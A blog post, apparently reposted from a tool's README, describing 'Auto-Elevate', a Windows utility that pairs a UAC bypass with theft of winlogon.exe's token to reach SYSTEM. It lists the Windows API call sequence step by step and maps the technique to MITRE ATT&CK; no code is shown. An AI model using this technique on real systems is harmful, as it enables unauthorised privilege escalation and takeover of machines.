Linchakin

Auto-Elevate - Escalate From A Low-Integrity Administrator Account To NT AUTHORITY\SYSTEM Without An LPE Exploit By Combining A COM UAC Bypass And Tok...

 April 01, 2022     No comments   

This tool demonstrates the power of UAC bypasses and built-in features of Windows. This utility auto-locates winlogon.exe, steals and impersonates it's process TOKEN, and spawns a new SYSTEM-level process with the stolen token. Combined with UAC bypass method #41 (ICMLuaUtil UAC bypass) from hfiref0x's UACME utility, this utility can auto-elevate a low privileged Administrative account to NT AUTHORITY\SYSTEM.

The following image demonstrates using UACME combined with Auto-Elevate to go from a low-privileged Administrator account to NT AUTHORITY\SYSTEM on Windows 10 21H1.

The following image demonstrates escalation from a high-privileged Administrator account to SYSTEM without a UAC bypass

Technical Explanation

The following steps are performed by Auto-Elevate to escalate from a low-privileged Administrator to SYSTEM:

Auto-Elevate

  1. The winlogon.exe process is located by enumerating the systems running processes with CreateToolhelp32Snapshot, Process32First, and Process32Next
  2. SeDebugPrivilege is enabled for the current process via a call to AdjustTokenPrivileges, as it's required to open a HANDLE to winlogon.exe
  3. A handle to the winlogon.exe process is opened by calling OpenProcess, for this call PROCESS_ALL_ACCESS is used (however, it's overkill)
  4. A handle to winlogon's process token is retrieved by calling OpenProcessToken combined with the previously obtained process handle 
  5. The user (SYSTEM) of winlogon is impersonated by calling ImpersonateLoggedOnUser
  6. The impersonated token handle is duplicated by calling DuplicateTokenEx with SecurityImpersonation, this creates a duplicated token we can use
  7. Using the duplicated, and impersonated token a new CMD instance is spawned by calling CreateProcessWithTokenW

To-Do

MITRE ATT&CK Mapping

  • Token Manipulation: T1134
  • Access Token Manipulation: Token Impersonation/Theft: T1134.001
  • Access Token Manipulation: Create Process with Token: T1134.002
  • Access Token Manipulation: Make and Impersonate Token: T1134.003

Adblock test (Why?)


You may be interested in:
>> Is a Chromebook worth replacing a Windows laptop?
>> Find out in detail the outstanding features of Google Pixel 4a
>> Top 7 best earbuds you should not miss

Related Posts:
>> Recognizing 12 Basic Body Shapes To Choose Better Clothes
>>Ranking the 10 most used smart technology devices
>> Top 5+ Best E-readers: Compact & Convenient Pen
  • Share This:  
  •  Facebook
  •  Twitter
  •  Google+
  •  Stumble
  •  Digg
Email ThisBlogThis!Share to XShare to Facebook

Related Posts:

  • CISSP - Tales of the UnexpectedWe have all heard the old adage how big surprises can come in small packages. If you are a candidate who is studying for the CISSP exam, or if you are… Read More
  • 15th Sep - nsetools in PythonIn the following tutorial, we will discuss the nsetools library in the Python programming language. We will understand its features and work with some… Read More
  • 15th Sep - Python program to find the nth Fibonacci NumberIn the following tutorial, we will understand how to find the nth Fibonacci Number using Python. We can define a Fibonacci Number, where the following… Read More
  • How I Integrated Cucumber Framework into a Test Project for BDD Implementation Cucumber Framework performs well in BDD implementation. Many companies are using BDD to develop test projects in development teams. I'll tell y… Read More
  • National Small Business Week: 10 Best Practices for Small Business CybersecurityA recent survey conducted by CNBC and Momentive found that 56% of small business owners are not concerned about being the victim of a cyberattack in t… Read More
Newer Post Older Post Home

0 Comments:

Post a Comment


Copyright © 2025 Linchakin | Powered by Blogger
Design by Hardeep Asrani | Blogger Theme by NewBloggerThemes.com | Distributed By Gooyaabi Templates